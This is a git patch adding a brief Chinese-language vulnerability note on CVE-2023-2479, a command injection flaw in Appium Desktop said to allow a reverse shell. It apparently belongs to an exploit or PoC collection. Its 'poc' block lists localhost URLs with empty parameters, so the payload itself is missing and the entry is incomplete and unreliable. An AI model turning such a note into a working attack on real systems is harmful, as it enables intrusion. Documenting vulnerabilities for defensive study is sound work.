From 2e37608631b007d128a4b84f126811da30d63ca1 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 22 Nov 2023 17:03:46 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Appium=20Desktop=20CVE-2023-2479?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Appium Desktop CVE-2023-2479漏洞.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 Appium Desktop CVE-2023-2479漏洞.md diff --git a/Appium Desktop CVE-2023-2479漏洞.md b/Appium Desktop CVE-2023-2479漏洞.md new file mode 100644 index 0000000..25833e2 --- /dev/null +++ b/Appium Desktop CVE-2023-2479漏洞.md @@ -0,0 +1,14 @@ +## Appium Desktop CVE-2023-2479漏洞 + +appium-desktop 是 Appium 服务器的图形界面,也是一个应用程序检查器 + +由于用户输入审查不当,此软件包的受影响版本容易受到命令注入的攻击,允许攻击者设置反向 shell。 + + +## poc +``` +http://127.0.0.1/?xss= + +http://127.0.0.1/?url= + +```